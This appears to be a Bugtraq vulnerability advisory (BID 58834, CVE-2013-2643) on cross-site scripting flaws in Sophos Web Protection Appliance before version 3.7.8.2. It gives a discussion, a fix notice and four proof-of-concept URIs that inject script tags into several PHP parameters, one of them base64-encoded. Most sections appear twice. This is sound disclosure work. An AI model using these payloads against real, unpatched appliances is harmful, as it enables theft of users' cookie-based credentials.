Sophos Web Protection Appliance Multiple Cross Site Scripting Vulnerabilities
BID:58834
Info
Sophos Web Protection Appliance Multiple Cross Site Scripting Vulnerabilities
| Bugtraq ID: | 58834 |
| Class: | Input Validation Error |
| CVE: |
CVE-2013-2643 |
| Remote: | Yes |
| Local: | No |
| Published: | Apr 03 2013 12:00AM |
| Updated: | Apr 03 2013 12:00AM |
| Credit: | Wolfgang Ettlinger of SEC Consult Vulnerability Lab |
| Vulnerable: | |
| Not Vulnerable: | |
Discussion
Sophos Web Protection Appliance Multiple Cross Site Scripting Vulnerabilities
Sophos Web Protection Appliance is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
Versions prior to Sophos Web Protection Appliance 3.7.8.2 are vulnerable.
Sophos Web Protection Appliance is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
Versions prior to Sophos Web Protection Appliance 3.7.8.2 are vulnerable.
Exploit / POC
Sophos Web Protection Appliance Multiple Cross Site Scripting Vulnerabilities
Attackers can exploit these issues with a web browser.
The following example URIs are available:
https://www.example.com/rss.php?action=allow&xss=%3Cscript%3Ealert%28String.fromCharCode%28120,%20115,%20115%29%29%3C/script%3E
https://www.example.com/end-user/errdoc.php?e=530&msg=PHNjcmlwdD5hbGVydCgneHNzJyk7PC9zY3JpcHQ%2bCg%3d%3d
https://www.example.com/end-user/ftp_redirect.php?r=x&h=%3C/script%3E%3Cscript%3Ealert%281%29%3b%3C/script%3E
https://www.example.com/index.php?c=blocked&reason=malware&user=&&threat=%3Cscript%3Ealert%281%29%3C/script%3E
Attackers can exploit these issues with a web browser.
The following example URIs are available:
https://www.example.com/rss.php?action=allow&xss=%3Cscript%3Ealert%28String.fromCharCode%28120,%20115,%20115%29%29%3C/script%3E
https://www.example.com/end-user/errdoc.php?e=530&msg=PHNjcmlwdD5hbGVydCgneHNzJyk7PC9zY3JpcHQ%2bCg%3d%3d
https://www.example.com/end-user/ftp_redirect.php?r=x&h=%3C/script%3E%3Cscript%3Ealert%281%29%3b%3C/script%3E
https://www.example.com/index.php?c=blocked&reason=malware&user=&&threat=%3Cscript%3Ealert%281%29%3C/script%3E
Solution / Fix
Sophos Web Protection Appliance Multiple Cross Site Scripting Vulnerabilities
Solution:
Updates are available. Please see the references or vendor advisory for more information.
Solution:
Updates are available. Please see the references or vendor advisory for more information.
References
Sophos Web Protection Appliance Multiple Cross Site Scripting Vulnerabilities
References:
References:
- Sophos Homepage (Sophos)